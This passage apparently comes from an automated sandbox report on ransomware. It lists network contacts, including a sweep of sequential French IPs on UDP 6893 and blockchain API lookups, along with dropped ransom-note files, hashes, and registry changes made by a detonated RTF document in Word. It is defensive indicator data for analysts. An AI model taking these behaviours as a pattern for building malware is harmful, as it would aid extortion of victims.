FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.98.10:80 api.blockcypher.com tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
US 8.8.8.8:53 chain.so udp
US 172.67.40.90:443 chain.so tcp

Files

memory/2192-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2192-0-0x00000000002E0000-0x0000000000311000-memory.dmp

memory/2192-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2192-5-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2192-9-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2192-75-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta

MD5 57a8c0d4fe772033335dd5a23a210911
SHA1 6f19c3a3e0a2037b3347a5563cc40fc4fc0eafde
SHA256 55fc9efb7c5157327de83d6483f0e75c7d52c1438683362e5c13a123d5826e3f
SHA512 dd3f911ef156ac061b20e4e190663971c92c616b09584059ad31b83bd1bb8790eacb75ee62f2145622a8da1ea6673e9d28da55c78c3e671fddf9938a4e3db8b0

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt

MD5 e518b413e44fb9f72485ca6d10a32a5b
SHA1 61171a22842177a69e19b123a4504d53c675a740
SHA256 708bb4f2709d9660a8fac808e561dad8026396346bc347185b1c7e8f1e1c158a
SHA512 5b4c17175031de5815bc9dad389c51e3eee917d2a64857369db708c52ef60aa9a42f60657f3db29dcd1db2179cfafb493eb97b3edaf85da779902bd8b0e82596

memory/2192-111-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar4E65.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2852-307-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2852-308-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2852-309-0x0000000140000000-0x00000001405E8000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1565s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
